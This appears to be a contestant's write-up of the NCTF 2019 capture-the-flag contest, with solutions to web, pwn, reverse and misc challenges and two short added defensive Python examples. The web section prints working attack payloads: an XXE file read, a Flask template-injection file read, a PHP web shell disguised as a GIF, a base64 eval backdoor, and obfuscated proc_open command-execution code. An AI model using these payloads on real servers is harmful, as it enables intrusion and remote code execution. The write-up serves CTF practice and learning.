NJUPT CTF writeup

Preface

Playing a small contest to keep in practice~

WEB

Fake XML cookbook

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE GVI [<!ENTITY flag SYSTEM "file:///flag" >]>
<user>
<username>&flag;</username>
<password>admin</password>
</user>

NCTF{W3lc0m3_T0_NCTF_9102}
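From the defender's side, the fix for this class of bug is to refuse DOCTYPE (and therefore entity) declarations before the parser ever sees them. The following is an added example, not code from the challenge; the sample documents are constructed, with the file target replaced by a placeholder:

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the payload shape from the challenge (target path replaced
# with a placeholder) next to a benign login document of the same structure.
XXE_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE GVI [<!ENTITY flag SYSTEM "file:///PLACEHOLDER_PATH" >]>
<user><username>&flag;</username><password>admin</password></user>"""

BENIGN_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<user><username>alice</username><password>s3cret</password></user>"""

# Any DOCTYPE is enough to declare entities, so reject the whole construct
# rather than trying to enumerate dangerous entity forms.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE/entity declaration."""


def is_safe(doc: bytes) -> bool:
    """True when the document declares no DOCTYPE at all."""
    return DOCTYPE_RE.search(doc) is None


def parse_login(doc: bytes) -> dict:
    """Pre-screen the document, then parse it and return its child fields.

    The stdlib expat-based parser does not fetch external entities on its
    own, but the pre-check keeps the behaviour explicit and parser-independent
    (with lxml the equivalent is XMLParser(resolve_entities=False)).
    """
    if not is_safe(doc):
        raise UnsafeXML("DOCTYPE/entity declarations are not accepted")
    root = ET.fromstring(doc)
    return {child.tag: (child.text or "") for child in root}


if __name__ == "__main__":
    print(parse_login(BENIGN_DOC))
    try:
        parse_login(XXE_DOC)
    except UnsafeXML as exc:
        print("rejected:", exc)
```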

True XML cookbook (unsolved)

flask

{{().__class__.__bases__[0].__subclasses__()[40]('/f'+'lag').read()}}

Well, this counts as a very simple SSTI; see my blog: sketchplane.top

upload your shell

1. Upload a file named v01cano.jpg directly, with the following content:

GIF89a<script language="php">eval($_POST[1]);</script>

2. The response returns the file path:

filepath:/var/www/html/upload-imgs/11d27c0cfce57aa050a1815412e1bb81/Th1s_is_a_fl4g.jpg


3. Use the file read vulnerability directly to read the contents of Th1s_is_a_fl4g.jpg:

http://nctf2019.x1ct34m.com:60002/index.php?action=upload-imgs/11d27c0cfce57aa050a1815412e1bb81/Th1s_is_a_fl4g.jpg

The flag obtained:

NCTF{upload_1s_s0_funn7}

simple_xss

Insert a snippet of cookie-stealing JS directly into the content box; the cookie is obtained successfully:

Replace the cookie to get the flag:

SQLi

"/robots.txt" -> "/hint.txt"

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

No more chatter, straight to the screenshots

A script gets caught on the %00 filter, so I fuzzed by hand, wsl

phar matches everything (unsolved)

Warning: getimagesize(http://nctf2019.x1ct34m.com:40004/upload.php%00.jpg): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/html/catchmime.php on line 28
File is not an image.

Reference links:
https://www.secpulse.com/archives/94680.html
https://www.cnblogs.com/BOHB-yunying/p/11504051.html
https://blog.csdn.net/xiaorouji/article/details/83118619

easyphp

?num=23333%0a
&str1=240610708
&str2=QPPQKSY
&q.w.q=ca\t *

Learned quite a bit from this one 2333

Level1

Exploits the fact that preg_match()'s pattern does not account for a trailing newline (I think; this kind of thing is sometimes hard to pin down = =

Level2

strtr() matches and replaces character by character...

Level3

$_GET['c_m_d']: when passing parameters, c_m_d is equivalent to c.m.d

cat * gets the flag directly
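The Level1 trick is worth seeing in a validator, because Python's `re` has the same behaviour as PCRE: `$` matches before a trailing newline, so `^\d+$` accepts "23333\n". This is an added example, not the challenge's own code; the numeric check is assumed, and the fix is `fullmatch` / `\Z` (the PHP equivalent is the `D` modifier or `\z`):

```python
import re

# Weak check: "$" also matches just before a final "\n", so a value such as
# "23333\n" (the %0a in the challenge URL) slips through as "all digits".
WEAK_NUMERIC = re.compile(r"^\d+$")

# Strict check: "\Z" only matches at the very end of the string.
STRICT_NUMERIC = re.compile(r"^\d+\Z")


def looks_numeric_weak(value: str) -> bool:
    """Mirror of a preg_match('/^\\d+$/') style check: newline-tolerant."""
    return WEAK_NUMERIC.match(value) is not None


def looks_numeric_strict(value: str) -> bool:
    """Anchored to the true end of input; equivalent to re.fullmatch(r'\\d+')."""
    return STRICT_NUMERIC.match(value) is not None


def looks_numeric_fullmatch(value: str) -> bool:
    """Same guarantee using fullmatch, which needs no anchors at all."""
    return re.fullmatch(r"\d+", value) is not None


if __name__ == "__main__":
    # Constructed inputs: the challenge value with and without the newline.
    for sample in ("23333", "23333\n"):
        print(repr(sample), looks_numeric_weak(sample),
              looks_numeric_strict(sample), looks_numeric_fullmatch(sample))
```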

replace

pat=xxx&sub=xxx&rep=%40eval(%40base64_decode(%24_POST%5Bn0ee1cca39220e%5D))%3B&n0ee1cca39220e=c3lzdGVtKCJjYXQgL2ZsYWciKTs=

NCTF{getshe11_has_different_methods}

backdoor

payload:

code=$p = proc_.open;
$p1 = p.i.pe;
$s = stre.am_.ge.t_con.te.nts;
$arr = array(
0 = array($p1,r),
1 = array($p1,w),
2 = array(fi.le,tmperror.l.og, a)
);
$cwd = ;
$env = array();
$process = $p(readflag, $arr, $p1, $cwd,$env);echo $s($p1[1]);
&useful=etcpasswd

search directory:

?code=$a=$p="/readflag";$d="d"."i"."r";$o=$d($p);$r="r"."e"."a"."d";while (false !== ($entry = $o->$r())) {
echo $entry."\n";
}&useful=/etc/passwd

readfile:

?code=$v="var_"."dump";$f="fil"."e";$v($f("/readflag"));
&useful=/etc/passwd

RCE:

?code=$p = "proc_"."open";
$p1 = "p"."i"."pe";
$s = "stre"."am_"."ge"."t_con"."te"."nts";
$arr = array(
0 => array($p1,"r"),
1 => array($p1,"w"),
2 => array("fi"."le","/tmp/error.l"."og", "a")
);
$cwd = "/";
$env = array();
$process = $p("/readflag", $arr, $p1, $cwd,$env);echo $s($p1[1]);
&useful=/etc/passwd

My whole thought process is laid out here...

RE

DEBUG

NCTF{just_debug_it_2333}

Reference link: https://blog.csdn.net/weixin_42621117/article/details/99768988

PWN

hello_pwn

from pwn import *

# The flag is printed in the service banner, so reading a few lines is enough.
r = remote('139.129.76.65', 50003)
r.recvline()
r.recvline()
r.recvline()

NCTF{hell0__play}

MISC

a_good_idea

A zip archive is appended to the end of the image. Extracting it gives a hint and two images; the hint says to compare the pixels of the two images. In Stegsolve, "to_do.png" - "to.png" = flag

NCTF{m1sc_1s_very_funny!!!}

Become a Rockstar

Concatenate everything that follows each "says"

NCTF{youarnicerockstar}

Bright Body I

Search directly for "NCTF" in the file \Bright Body I\Magic\Content\Paks\Magic-WindowsNoEditor.pak to get the flag

NCTF{R_U_4_D4rk5Ou1s_III_P14y3r}

有内鬼,终止交易 (There's a mole, abort the deal)

// config.json
{
"server":"123.207.121.32",
"server_port":25565,
"local_port":1080,
"password":"5e77b05530b30283e24c120d8cc13fb5",
"timeout":600,
"method":"aes-256-cfb",
"local_address":"127.0.0.1"
}

Decrypt the shadowsocks traffic capture

键盘侠 (Keyboard Warrior)

The zip is pseudo-encrypted; extracting it gives an image with a doc file appended at the end. In Word: File - Options - Display hidden text, select the text - Font - uncheck Hidden - copy - base85 decode to get the flag

# original
PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE

# flag
NCTF{Ba3e85_issssss_so_xxxxx}

Reference link: https://www.cnblogs.com/Yuuki-/p/7897069.html

What's this

Export the archive and undo the pseudo-encryption to get a text file; decode the base64 steganography, then convert the binary to a string to get the flag

NCTF{dbb2ef54afc2877ed9973780606a3c8b}

2077

i: 0-2986 (the segment index in the URLs below)
https://vod-secure.twitch.tv/0b27f6f98c0cbb6c6c1e_cdprojektred_30100213392_949888768/360p30/i.ts
https://vod-secure.twitch.tv/0b27f6f98c0cbb6c6c1e_cdprojektred_30100213392_949888768/chunked/i.ts

wget -i dl.csv

ffmpeg -f concat -i filelist.txt -c copy output.mp4

ffmpeg -i output.mp4 -r 0.018 image-%05d.jpg

PS C:\> ./drop_package

pip install

Run pip install --user nctf-2019-installme; the console output contains a download link for an archive. Download and extract it to get the source; in "setup.py" there is a base64-encoded flag, which decodes to

NCTF{c4reful_ab0u7_ev1l_pip_p4ckage}

Uninstall with pip uninstall nctf-2019-installme; the location of the real flag file is //TODO

NCTF2019 survey

NCTF{Thank_you_for_participating_NCTF2019!}

keyboard

wertyuio map to 2-9 respectively, i.e. the phone 9-key keypad...

NCTF{youaresosmartthatthisisjustapieceofcake}

Summary

Missed it by exactly one place = =

This is already the third time I've fallen just short; mainly wtcl (I'm too weak), and there was a flask debug challenge I was one step away from.

Also thanks to T1M and 火山 for carrying me~